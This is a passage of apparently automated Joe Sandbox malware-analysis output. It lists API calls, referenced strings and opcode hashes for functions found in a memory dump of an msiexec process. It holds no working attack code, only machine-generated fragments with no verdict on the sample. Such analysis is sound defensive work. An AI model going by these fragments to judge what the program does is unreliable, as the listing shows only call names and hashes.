                                                                                                            • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 00402FD7
                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                            • strlen.MSVCRT ref: 00403006
                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2754987064-0
                                                                                                            • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                            • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                            • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                            • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcscpy$CloseHandle
                                                                                                            • String ID: General
                                                                                                            • API String ID: 3722638380-26480598
                                                                                                            • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                            • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                            • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                            • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                            APIs
                                                                                                              • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                              • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                              • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                            • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                            • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                            • String ID:
                                                                                                            • API String ID: 764393265-0
                                                                                                            • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                            • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                            • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                            • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                            APIs
                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Time$System$File$LocalSpecific
                                                                                                            • String ID:
                                                                                                            • API String ID: 979780441-0
                                                                                                            • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                            • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                            • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                            • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                            APIs
                                                                                                            • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                            • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                            • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy$DialogHandleModuleParam
                                                                                                            • String ID:
                                                                                                            • API String ID: 1386444988-0
                                                                                                            • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                            • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                            • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                            • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??3@
                                                                                                            • String ID:
                                                                                                            • API String ID: 613200358-0
                                                                                                            • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                            • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                            • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                            • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                            • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InvalidateMessageRectSend
                                                                                                            • String ID: d=E
                                                                                                            • API String ID: 909852535-3703654223
                                                                                                            • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                            • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                            • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                            • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                            APIs
                                                                                                            • wcschr.MSVCRT ref: 0040F79E
                                                                                                            • wcschr.MSVCRT ref: 0040F7AC
                                                                                                              • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                              • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcschr$memcpywcslen
                                                                                                            • String ID: "
                                                                                                            • API String ID: 1983396471-123907689
                                                                                                            • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                            • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                            • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                            • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                            • _memicmp.MSVCRT ref: 0040C00D
                                                                                                            • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer_memicmpmemcpy
                                                                                                            • String ID: URL
                                                                                                            • API String ID: 2108176848-3574463123
                                                                                                            • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                            • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                            • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                            • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                            APIs
                                                                                                            • _snwprintf.MSVCRT ref: 0040A398
                                                                                                            • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _snwprintfmemcpy
                                                                                                            • String ID: %2.2X
                                                                                                            • API String ID: 2789212964-323797159
                                                                                                            • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                            • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                            • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                            • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _snwprintf
                                                                                                            • String ID: %%-%d.%ds
                                                                                                            • API String ID: 3988819677-2008345750
                                                                                                            • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                            • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                            • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                            • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040E770
                                                                                                            • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendmemset
                                                                                                            • String ID: F^@
                                                                                                            • API String ID: 568519121-3652327722
                                                                                                            • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                            • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                            • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                            • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PlacementWindowmemset
                                                                                                            • String ID: WinPos
                                                                                                            • API String ID: 4036792311-2823255486
                                                                                                            • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                            • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                            • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                            • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                            APIs
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                            • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??3@DeleteObject
                                                                                                            • String ID: r!A
                                                                                                            • API String ID: 1103273653-628097481
                                                                                                            • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                            • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                            • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                            • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                            APIs
                                                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                            • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                            • wcscat.MSVCRT ref: 0040DCFF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleNamewcscatwcsrchr
                                                                                                            • String ID: _lng.ini
                                                                                                            • API String ID: 383090722-1948609170
                                                                                                            • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                            • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                            • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                            • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                            • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                            • API String ID: 2773794195-880857682
                                                                                                            • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                            • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                            • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                            • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                            APIs
                                                                                                            • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                            • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                            • memset.MSVCRT ref: 0042BAAE
                                                                                                            • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy$memset
                                                                                                            • String ID:
                                                                                                            • API String ID: 438689982-0
                                                                                                            • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                            • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                            • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                            • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??2@$memset
                                                                                                            • String ID:
                                                                                                            • API String ID: 1860491036-0
                                                                                                            • Opcode ID: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                                            • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                            • Opcode Fuzzy Hash: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                                            • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                            APIs
                                                                                                            • wcslen.MSVCRT ref: 0040A8E2
                                                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                            • free.MSVCRT ref: 0040A908
                                                                                                            • free.MSVCRT ref: 0040A92B
                                                                                                            • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: free$memcpy$mallocwcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 726966127-0
                                                                                                            • Opcode ID: 9067421bb5060c399d83e8366b459fd1559f14f7a756e12873c92b79cc47865f
                                                                                                            • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                            • Opcode Fuzzy Hash: 9067421bb5060c399d83e8366b459fd1559f14f7a756e12873c92b79cc47865f
                                                                                                            • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                            APIs
                                                                                                            • wcslen.MSVCRT ref: 0040B1DE
                                                                                                            • free.MSVCRT ref: 0040B201
                                                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                            • free.MSVCRT ref: 0040B224
                                                                                                            • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: free$memcpy$mallocwcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 726966127-0
                                                                                                            • Opcode ID: a695ade3a7797f376f201de80decb40066d5f736b135f44090dc4a6cd17a09b2
                                                                                                            • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                            • Opcode Fuzzy Hash: a695ade3a7797f376f201de80decb40066d5f736b135f44090dc4a6cd17a09b2
                                                                                                            • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                            APIs
                                                                                                            • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                              • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                              • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                              • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                            • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                            • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                            • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcmp$memcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 231171946-0
                                                                                                            • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                            • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                            • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                            • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                            APIs
                                                                                                            • strlen.MSVCRT ref: 0040B0D8
                                                                                                            • free.MSVCRT ref: 0040B0FB
                                                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                            • free.MSVCRT ref: 0040B12C
                                                                                                            • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: free$memcpy$mallocstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3669619086-0
                                                                                                            • Opcode ID: ee8347e84c53985be3907e5f73125604e6f6c519928a85103321f6ac1e1b5c7d
                                                                                                            • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                            • Opcode Fuzzy Hash: ee8347e84c53985be3907e5f73125604e6f6c519928a85103321f6ac1e1b5c7d
                                                                                                            • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                            APIs
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
